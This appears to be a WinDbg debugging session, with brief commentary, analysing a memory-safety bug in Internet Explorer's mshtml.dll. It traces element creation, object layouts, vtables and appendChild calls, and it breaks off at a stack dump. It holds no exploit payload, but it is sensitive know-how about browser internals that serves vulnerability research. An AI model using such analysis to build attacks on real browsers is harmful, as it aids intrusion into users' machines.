eax=00000600 ebx=6a2a8308 ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234bd3 esp=0425e660 ebp=0425e678 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CreateElement+0x24:
6a234bd3 05709a2c6a      add     eax,offset mshtml!g_atagdesc (6a2c9a70)
1:021> 
eax=6a2ca070 ebx=6a2a8308 ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234bd8 esp=0425e660 ebp=0425e678 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CreateElement+0x29:
6a234bd8 0f84b34e1500    je      mshtml!CreateElement+0x2b (6a389a91)    [br=0]
1:021> 
eax=6a2ca070 ebx=6a2a8308 ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234bde esp=0425e660 ebp=0425e678 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CreateElement+0x38:
6a234bde 8b4008          mov     eax,dword ptr [eax+8] ds:0023:6a2ca078={mshtml!CPhraseElement::CreateElement (6a269f4b)}
1:021> 
eax=6a269f4b ebx=6a2a8308 ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234be1 esp=0425e660 ebp=0425e678 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CreateElement+0x3b:
6a234be1 8d4d10          lea     ecx,[ebp+10h]
1:021> 
eax=6a269f4b ebx=6a2a8308 ecx=0425e688 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234be4 esp=0425e660 ebp=0425e678 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CreateElement+0x3e:
6a234be4 51              push    ecx
1:021> 
eax=6a269f4b ebx=6a2a8308 ecx=0425e688 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234be5 esp=0425e65c ebp=0425e678 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CreateElement+0x3f:
6a234be5 52              push    edx
1:021> 
eax=6a269f4b ebx=6a2a8308 ecx=0425e688 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234be6 esp=0425e658 ebp=0425e678 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CreateElement+0x40:
6a234be6 57              push    edi
1:021> 
eax=6a269f4b ebx=6a2a8308 ecx=0425e688 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234be7 esp=0425e654 ebp=0425e678 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CreateElement+0x41:
6a234be7 ffd0            call    eax {mshtml!CPhraseElement::CreateElement (6a269f4b)}
1:021> ln eax
(6a269f4b)   mshtml!CPhraseElement::CreateElement   |  (6a269fdd)   mshtml!FindPeer
Exact matches:
    mshtml!CPhraseElement::CreateElement = <no type information>

So var id_0 = document.createElement("sup"); leads to the creation of a CPhraseElement object

bu mshtml!CElement::CElement

Let's look at the contents of this object, although it probably has little to do with triggering the vulnerability

1:021> p
Breakpoint 6 hit
eax=1af02fd8 ebx=6a2a8308 ecx=7782349f edx=00000000 esi=1af02fd8 edi=00000000
eip=6a23480f esp=0425e638 ebp=0425e64c iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CElement::CElement:
6a23480f 8bff            mov     edi,edi
1:021> 
eax=1af02fd8 ebx=6a2a8308 ecx=7782349f edx=00000000 esi=1af02fd8 edi=00000000
eip=6a234811 esp=0425e638 ebp=0425e64c iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CElement::CElement+0x2:
6a234811 55              push    ebp
1:021> 
eax=1af02fd8 ebx=6a2a8308 ecx=7782349f edx=00000000 esi=1af02fd8 edi=00000000
eip=6a234812 esp=0425e634 ebp=0425e64c iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CElement::CElement+0x3:
6a234812 8bec            mov     ebp,esp
1:021> 
eax=1af02fd8 ebx=6a2a8308 ecx=7782349f edx=00000000 esi=1af02fd8 edi=00000000
eip=6a234814 esp=0425e634 ebp=0425e634 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CElement::CElement+0x5:
6a234814 53              push    ebx
1:021> 
eax=1af02fd8 ebx=6a2a8308 ecx=7782349f edx=00000000 esi=1af02fd8 edi=00000000
eip=6a234815 esp=0425e630 ebp=0425e634 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CElement::CElement+0x6:
6a234815 8b5d0c          mov     ebx,dword ptr [ebp+0Ch] ss:0023:0425e640=05ad0680
1:021> 
eax=1af02fd8 ebx=05ad0680 ecx=7782349f edx=00000000 esi=1af02fd8 edi=00000000
eip=6a234818 esp=0425e630 ebp=0425e634 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CElement::CElement+0x9:
6a234818 56              push    esi
1:021> 
eax=1af02fd8 ebx=05ad0680 ecx=7782349f edx=00000000 esi=1af02fd8 edi=00000000
eip=6a234819 esp=0425e62c ebp=0425e634 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CElement::CElement+0xa:
6a234819 57              push    edi
1:021> 
eax=1af02fd8 ebx=05ad0680 ecx=7782349f edx=00000000 esi=1af02fd8 edi=00000000
eip=6a23481a esp=0425e628 ebp=0425e634 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CElement::CElement+0xb:
6a23481a 8bf8            mov     edi,eax
1:021> dd eax
1af02fd8  00000000 00000000 00000000 00000000
1af02fe8  00000000 00000000 00000000 00000000
1af02ff8  00000000 00000000 ???????? ????????
1af03008  ???????? ???????? ???????? ????????
1af03018  ???????? ???????? ???????? ????????
1af03028  ???????? ???????? ???????? ????????
1af03038  ???????? ???????? ???????? ????????
1af03048  ???????? ???????? ???????? ????????
1:021> p
eax=1af02fd8 ebx=05ad0680 ecx=7782349f edx=00000000 esi=1af02fd8 edi=1af02fd8
eip=6a23481c esp=0425e628 ebp=0425e634 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CElement::CElement+0xd:
6a23481c 8bf7            mov     esi,edi
1:021> 
eax=1af02fd8 ebx=05ad0680 ecx=7782349f edx=00000000 esi=1af02fd8 edi=1af02fd8
eip=6a23481e esp=0425e628 ebp=0425e634 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CElement::CElement+0xf:
6a23481e e80c300800      call    mshtml!CBase::CBase (6a2b782f)
1:021> 
eax=1af02fd8 ebx=05ad0680 ecx=6a6251a0 edx=00000000 esi=1af02fd8 edi=1af02fd8
eip=6a234823 esp=0425e628 ebp=0425e634 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CElement::CElement+0x14:
6a234823 83672400        and     dword ptr [edi+24h],0 ds:0023:1af02ffc=00000000
1:021> 
eax=1af02fd8 ebx=05ad0680 ecx=6a6251a0 edx=00000000 esi=1af02fd8 edi=1af02fd8
eip=6a234827 esp=0425e628 ebp=0425e634 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CElement::CElement+0x18:
6a234827 c707b0540f6a    mov     dword ptr [edi],offset mshtml!CElement::`vftable' (6a0f54b0) ds:0023:1af02fd8={mshtml!CEncode::`vftable' (6a2b785c)}
1:021> 
eax=1af02fd8 ebx=05ad0680 ecx=6a6251a0 edx=00000000 esi=1af02fd8 edi=1af02fd8
eip=6a23482d esp=0425e628 ebp=0425e634 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CElement::CElement+0x1e:
6a23482d 8b03            mov     eax,dword ptr [ebx]  ds:0023:05ad0680={mshtml!CDoc::`vftable' (6a2a1e88)}
1:021> 
eax=6a2a1e88 ebx=05ad0680 ecx=6a6251a0 edx=00000000 esi=1af02fd8 edi=1af02fd8
eip=6a23482f esp=0425e628 ebp=0425e634 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CElement::CElement+0x20:
6a23482f 8bcb            mov     ecx,ebx
1:021> 
eax=6a2a1e88 ebx=05ad0680 ecx=05ad0680 edx=00000000 esi=1af02fd8 edi=1af02fd8
eip=6a234831 esp=0425e628 ebp=0425e634 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CElement::CElement+0x22:
6a234831 ff5070          call    dword ptr [eax+70h]  ds:0023:6a2a1ef8={mshtml!CDoc::SecurityContext (6a234733)}
1:021> 
eax=074befe8 ebx=05ad0680 ecx=05ad0680 edx=00000000 esi=1af02fd8 edi=1af02fd8
eip=6a234834 esp=0425e628 ebp=0425e634 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CElement::CElement+0x25:
6a234834 8bf0            mov     esi,eax
1:021> 
eax=074befe8 ebx=05ad0680 ecx=05ad0680 edx=00000000 esi=074befe8 edi=1af02fd8
eip=6a234836 esp=0425e628 ebp=0425e634 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CElement::CElement+0x27:
6a234836 e828000000      call    mshtml!CElement::ReplaceSecurityContext (6a234863)
1:021> 
eax=00000004 ebx=05ad0680 ecx=6a2a92e1 edx=00000000 esi=074befe8 edi=1af02fd8
eip=6a23483b esp=0425e628 ebp=0425e634 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CElement::CElement+0x2c:
6a23483b 83430808        add     dword ptr [ebx+8],8  ds:0023:05ad0688=000000a0
1:021> 
eax=00000004 ebx=05ad0680 ecx=6a2a92e1 edx=00000000 esi=074befe8 edi=1af02fd8
eip=6a23483f esp=0425e628 ebp=0425e634 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CElement::CElement+0x30:
6a23483f e8123d0800      call    mshtml!_IncrementObjectCount (6a2b8556)
1:021> 
eax=0000003b ebx=05ad0680 ecx=6a6251a0 edx=00000000 esi=074befe8 edi=1af02fd8
eip=6a234844 esp=0425e628 ebp=0425e634 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CElement::CElement+0x35:
6a234844 8a4508          mov     al,byte ptr [ebp+8]        ss:0023:0425e63c=60
1:021> 
eax=00000060 ebx=05ad0680 ecx=6a6251a0 edx=00000000 esi=074befe8 edi=1af02fd8
eip=6a234847 esp=0425e628 ebp=0425e634 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CElement::CElement+0x38:
6a234847 81671cfffffbff  and     dword ptr [edi+1Ch],0FFFBFFFFh ds:0023:1af02ff4=00000000
1:021> 
eax=00000060 ebx=05ad0680 ecx=6a6251a0 edx=00000000 esi=074befe8 edi=1af02fd8
eip=6a23484e esp=0425e628 ebp=0425e634 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CElement::CElement+0x3f:
6a23484e 806720fe        and     byte ptr [edi+20h],0FEh    ds:0023:1af02ff8=00
1:021> 
eax=00000060 ebx=05ad0680 ecx=6a6251a0 edx=00000000 esi=074befe8 edi=1af02fd8
eip=6a234852 esp=0425e628 ebp=0425e634 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CElement::CElement+0x43:
6a234852 884718          mov     byte ptr [edi+18h],al      ds:0023:1af02ff0=00
1:021> 
eax=00000060 ebx=05ad0680 ecx=6a6251a0 edx=00000000 esi=074befe8 edi=1af02fd8
eip=6a234855 esp=0425e628 ebp=0425e634 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CElement::CElement+0x46:
6a234855 8bc7            mov     eax,edi
1:021> 
eax=1af02fd8 ebx=05ad0680 ecx=6a6251a0 edx=00000000 esi=074befe8 edi=1af02fd8
eip=6a234857 esp=0425e628 ebp=0425e634 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CElement::CElement+0x48:
6a234857 5f              pop     edi
1:021> 
eax=1af02fd8 ebx=05ad0680 ecx=6a6251a0 edx=00000000 esi=074befe8 edi=00000000
eip=6a234858 esp=0425e62c ebp=0425e634 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CElement::CElement+0x49:
6a234858 5e              pop     esi
1:021> dd eax
1af02fd8  6a0f54b0 00000001 00000008 00000000
1af02fe8  00000000 00000000 00000060 00000000
1af02ff8  00000000 074befe8 ???????? ????????
1af03008  ???????? ???????? ???????? ????????
1af03018  ???????? ???????? ???????? ????????
1af03028  ???????? ???????? ???????? ????????
1af03038  ???????? ???????? ???????? ????????
1af03048  ???????? ???????? ???????? ????????
1:021> ln 6a0f54b0 
(6a0f54b0)   mshtml!CElement::`vftable'   |  (6a1008c0)   mshtml!CShape::`vftable'
Exact matches:
    mshtml!CElement::`vftable' = <no type information>
1:021> dd 074befe8 
074befe8  6a2a8c34 00000004 00000001 05ad0680
074beff8  00000000 00000000 ???????? ????????
074bf008  ???????? ???????? ???????? ????????
074bf018  ???????? ???????? ???????? ????????
074bf028  ???????? ???????? ???????? ????????
074bf038  ???????? ???????? ???????? ????????
074bf048  ???????? ???????? ???????? ????????
074bf058  ???????? ???????? ???????? ????????
1:021> ln 6a2a8c34 
(6a2a8c34)   mshtml!CSecurityContext::`vftable'   |  (6a2a8c44)   mshtml!CInvalidatedSecurityContext::`vftable'
Exact matches:
    mshtml!CSecurityContext::`vftable' = <no type information>

Here you can see the CPhraseElement object after initialization. Interestingly, at offset 0x28 of the object there is a pointer to a CSecurityContext object.

1:021> g
Breakpoint 2 hit
eax=0425e750 ebx=06d62f30 ecx=06d62f30 edx=05ad0680 esi=00000000 edi=0425e6a8
eip=6a234bb0 esp=0425e67c ebp=0425e718 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CreateElement:
6a234bb0 8bff            mov     edi,edi
1:021> p
eax=0425e750 ebx=06d62f30 ecx=06d62f30 edx=05ad0680 esi=00000000 edi=0425e6a8
eip=6a234bb2 esp=0425e67c ebp=0425e718 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CreateElement+0x2:
6a234bb2 55              push    ebp
1:021> 
eax=0425e750 ebx=06d62f30 ecx=06d62f30 edx=05ad0680 esi=00000000 edi=0425e6a8
eip=6a234bb3 esp=0425e678 ebp=0425e718 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CreateElement+0x3:
6a234bb3 8bec            mov     ebp,esp
1:021> 
eax=0425e750 ebx=06d62f30 ecx=06d62f30 edx=05ad0680 esi=00000000 edi=0425e6a8
eip=6a234bb5 esp=0425e678 ebp=0425e678 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CreateElement+0x5:
6a234bb5 83ec10          sub     esp,10h
1:021> 
eax=0425e750 ebx=06d62f30 ecx=06d62f30 edx=05ad0680 esi=00000000 edi=0425e6a8
eip=6a234bb8 esp=0425e668 ebp=0425e678 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CreateElement+0x8:
6a234bb8 53              push    ebx
1:021> 
eax=0425e750 ebx=06d62f30 ecx=06d62f30 edx=05ad0680 esi=00000000 edi=0425e6a8
eip=6a234bb9 esp=0425e664 ebp=0425e678 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CreateElement+0x9:
6a234bb9 8b5d10          mov     ebx,dword ptr [ebp+10h] ss:0023:0425e688=00000000
1:021> 
eax=0425e750 ebx=00000000 ecx=06d62f30 edx=05ad0680 esi=00000000 edi=0425e6a8
eip=6a234bbc esp=0425e664 ebp=0425e678 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CreateElement+0xc:
6a234bbc 56              push    esi
1:021> 
eax=0425e750 ebx=00000000 ecx=06d62f30 edx=05ad0680 esi=00000000 edi=0425e6a8
eip=6a234bbd esp=0425e660 ebp=0425e678 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CreateElement+0xd:
6a234bbd c7451000000000  mov     dword ptr [ebp+10h],0 ss:0023:0425e688=00000000
1:021> 
eax=0425e750 ebx=00000000 ecx=06d62f30 edx=05ad0680 esi=00000000 edi=0425e6a8
eip=6a234bc4 esp=0425e660 ebp=0425e678 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CreateElement+0x14:
6a234bc4 85db            test    ebx,ebx
1:021> 
eax=0425e750 ebx=00000000 ecx=06d62f30 edx=05ad0680 esi=00000000 edi=0425e6a8
eip=6a234bc6 esp=0425e660 ebp=0425e678 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CreateElement+0x16:
6a234bc6 0f84c67d0300    je      mshtml!CreateElement+0x18 (6a26c992)    [br=1]
1:021> 
eax=0425e750 ebx=00000000 ecx=06d62f30 edx=05ad0680 esi=00000000 edi=0425e6a8
eip=6a26c992 esp=0425e660 ebp=0425e678 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CreateElement+0x18:
6a26c992 bb08832a6a      mov     ebx,offset mshtml!g_Zero (6a2a8308)
1:021> 
eax=0425e750 ebx=6a2a8308 ecx=06d62f30 edx=05ad0680 esi=00000000 edi=0425e6a8
eip=6a26c997 esp=0425e660 ebp=0425e678 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CreateElement+0x1d:
6a26c997 e93082fcff      jmp     mshtml!CreateElement+0x1d (6a234bcc)
1:021> 
eax=0425e750 ebx=6a2a8308 ecx=06d62f30 edx=05ad0680 esi=00000000 edi=0425e6a8
eip=6a234bcc esp=0425e660 ebp=0425e678 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CreateElement+0x1d:
6a234bcc 0fb64701        movzx   eax,byte ptr [edi+1]       ds:0023:0425e6a9=75
1:021> 
eax=00000075 ebx=6a2a8308 ecx=06d62f30 edx=05ad0680 esi=00000000 edi=0425e6a8
eip=6a234bd0 esp=0425e660 ebp=0425e678 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CreateElement+0x21:
6a234bd0 c1e004          shl     eax,4
1:021> 
eax=00000750 ebx=6a2a8308 ecx=06d62f30 edx=05ad0680 esi=00000000 edi=0425e6a8
eip=6a234bd3 esp=0425e660 ebp=0425e678 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CreateElement+0x24:
6a234bd3 05709a2c6a      add     eax,offset mshtml!g_atagdesc (6a2c9a70)
1:021> 
eax=6a2ca1c0 ebx=6a2a8308 ecx=06d62f30 edx=05ad0680 esi=00000000 edi=0425e6a8
eip=6a234bd8 esp=0425e660 ebp=0425e678 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CreateElement+0x29:
6a234bd8 0f84b34e1500    je      mshtml!CreateElement+0x2b (6a389a91)    [br=0]
1:021> p
eax=6a2ca1c0 ebx=6a2a8308 ecx=06d62f30 edx=05ad0680 esi=00000000 edi=0425e6a8
eip=6a234bde esp=0425e660 ebp=0425e678 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CreateElement+0x38:
6a234bde 8b4008          mov     eax,dword ptr [eax+8] ds:0023:6a2ca1c8={mshtml!CGenericElement::CreateElement (6a11c234)}
1:021> 
eax=6a11c234 ebx=6a2a8308 ecx=06d62f30 edx=05ad0680 esi=00000000 edi=0425e6a8
eip=6a234be1 esp=0425e660 ebp=0425e678 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CreateElement+0x3b:
6a234be1 8d4d10          lea     ecx,[ebp+10h]
1:021> 
eax=6a11c234 ebx=6a2a8308 ecx=0425e688 edx=05ad0680 esi=00000000 edi=0425e6a8
eip=6a234be4 esp=0425e660 ebp=0425e678 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CreateElement+0x3e:
6a234be4 51              push    ecx
1:021> 
eax=6a11c234 ebx=6a2a8308 ecx=0425e688 edx=05ad0680 esi=00000000 edi=0425e6a8
eip=6a234be5 esp=0425e65c ebp=0425e678 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CreateElement+0x3f:
6a234be5 52              push    edx
1:021> 
eax=6a11c234 ebx=6a2a8308 ecx=0425e688 edx=05ad0680 esi=00000000 edi=0425e6a8
eip=6a234be6 esp=0425e658 ebp=0425e678 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CreateElement+0x40:
6a234be6 57              push    edi
1:021> 
eax=6a11c234 ebx=6a2a8308 ecx=0425e688 edx=05ad0680 esi=00000000 edi=0425e6a8
eip=6a234be7 esp=0425e654 ebp=0425e678 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CreateElement+0x41:
6a234be7 ffd0            call    eax {mshtml!CGenericElement::CreateElement (6a11c234)}
1:021> ln eax
(6a11c234)   mshtml!CGenericElement::CreateElement   |  (6a11c279)   mshtml!CGenericElement::CGenericElement
Exact matches:
    mshtml!CGenericElement::CreateElement = <no type information>

So var id_1 = document.createElement("audio"); results in the creation of a CGenericElement object.

1:021> g
Breakpoint 6 hit
eax=07824fc8 ebx=07824fc8 ecx=7782349f edx=00000000 esi=0425e6a8 edi=0425e6a8
eip=6a23480f esp=0425e614 ebp=0425e638 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000212
mshtml!CElement::CElement:
6a23480f 8bff            mov     edi,edi
1:021> p
eax=07824fc8 ebx=07824fc8 ecx=7782349f edx=00000000 esi=0425e6a8 edi=0425e6a8
eip=6a234811 esp=0425e614 ebp=0425e638 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000212
mshtml!CElement::CElement+0x2:
6a234811 55              push    ebp
1:021> 
eax=07824fc8 ebx=07824fc8 ecx=7782349f edx=00000000 esi=0425e6a8 edi=0425e6a8
eip=6a234812 esp=0425e610 ebp=0425e638 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000212
mshtml!CElement::CElement+0x3:
6a234812 8bec            mov     ebp,esp
1:021> dd eax
07824fc8  00000000 00000000 00000000 00000000
07824fd8  00000000 00000000 00000000 00000000
07824fe8  00000000 00000000 00000000 00000000
07824ff8  00000000 00000000 ???????? ????????
07825008  ???????? ???????? ???????? ????????
07825018  ???????? ???????? ???????? ????????
07825028  ???????? ???????? ???????? ????????
07825038  ???????? ???????? ???????? ????????

This is the base-class constructor inherited by the CGenericElement object. There is no need to single-step it to the return, because for any instance of a subclass of CElement the initialization is identical, except for the type flag value at offset 0x24.


1:021> g
Breakpoint 3 hit
eax=00000000 ebx=0425e960 ecx=00000005 edx=00000003 esi=0425e950 edi=0425e950
eip=6c77d67f esp=0425e834 ebp=0425e870 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000212
jscript!cos:
6c77d67f ff259010756c    jmp     dword ptr [jscript!_imp__cos (6c751090)] ds:0023:6c751090={msvcrt!cos (773d8ace)}


This is where it gets interesting; note the breakpoints I set.

1:021> bl
 0 e 6c77d8c0     0001 (0001)  1:**** jscript!tan
 1 e 6a23d88c     0001 (0001)  1:**** mshtml!CreateElement
 2 e 6a234bb0     0001 (0001)  1:**** mshtml!CreateElement
 3 e 6c77d67f     0001 (0001)  1:**** jscript!cos
 4 e 6a1f20c4     0001 (0001)  1:**** mshtml!CElement::appendChild
 5 e 6a2bced0     0001 (0001)  1:**** mshtml!CTreeNode::CTreeNode
 6 e 6a23480f     0001 (0001)  1:**** mshtml!CElement::CElement

Common knowledge says that CxxxElement objects and CTreeNode objects are in one-to-one correspondence, but here you can see that creating an element does not necessarily create a CTreeNode.


1:021> g
Breakpoint 4 hit
eax=15284fd8 ebx=6a628b0c ecx=6a1f20c4 edx=0425e7f4 esi=00001200 edi=00000000
eip=6a1f20c4 esp=0425e7c8 ebp=0425e7f8 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
mshtml!CElement::appendChild:
6a1f20c4 8bff            mov     edi,edi
1:021> dd esp
0425e7c8  6a1f1436 150e3fd0 1b1dcfd8 0425e850
0425e7d8  176bafd0 6a1f13ba 6a2ae458 a9ca0dc9
0425e7e8  9bcb0009 1b1dcfd8 00000000 00000000
0425e7f8  0425e86c 6a32235c 150e3fd0 176bafd0
0425e808  15284fd8 0000004c 6a2ae458 00000001
0425e818  0425ea40 0425e848 176bafd0 00000000
0425e828  80070005 80020003 0dbb001b 00000000
0425e838  0000004c 15284fd8 00000000 00000001
1:021> dd 150e3fd0 
150e3fd0  6a246670 00000005 00000008 07701fe8
150e3fe0  071fae80 15171fb0 00000010 8202e280
150e3ff0  00000002 104d4f00 00000000 d0d0d0d0
150e4000  ???????? ???????? ???????? ????????
150e4010  ???????? ???????? ???????? ????????
150e4020  ???????? ???????? ???????? ????????
150e4030  ???????? ???????? ???????? ????????
150e4040  ???????? ???????? ???????? ????????
1:021> ln 6a246670 
(6a246670)   mshtml!CBodyElement::`vftable'   |  (6a2a9108)   mshtml!CCaret::`vftable'
Exact matches:
    mshtml!CBodyElement::`vftable' = <no type information>
1:021> dd 1b1dcfd8 
1b1dcfd8  6a627f68 00000001 6a2d2fa8 1af02fd8
1b1dcfe8  6a2aaadc 00000000 00000000 00020000
1b1dcff8  03000048 00000000 ???????? ????????
1b1dd008  ???????? ???????? ???????? ????????
1b1dd018  ???????? ???????? ???????? ????????
1b1dd028  ???????? ???????? ???????? ????????
1b1dd038  ???????? ???????? ???????? ????????
1b1dd048  ???????? ???????? ???????? ????????
1:021> ln 6a627f68 
(6a627f68)   mshtml!s_apfnTrackerTearoffVtable   |  (6a6280a0)   mshtml!s_fontFamilyMap
Exact matches:
    mshtml!s_apfnTrackerTearoffVtable = <no type information>

It can be seen that the first argument to CElement::appendChild is the parent object (body) that the child is being added to.

1:021> t
eax=150e3fd0 ebx=6a628b0c ecx=00000000 edx=00000000 esi=1b1dcfd8 edi=0425e850
eip=6a1f2170 esp=0425e76c ebp=0425e784 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CElement::InsertBeforeHelper:
6a1f2170 8bff            mov     edi,edi
1:021> kv
ChildEBP RetAddr  Args to Child              
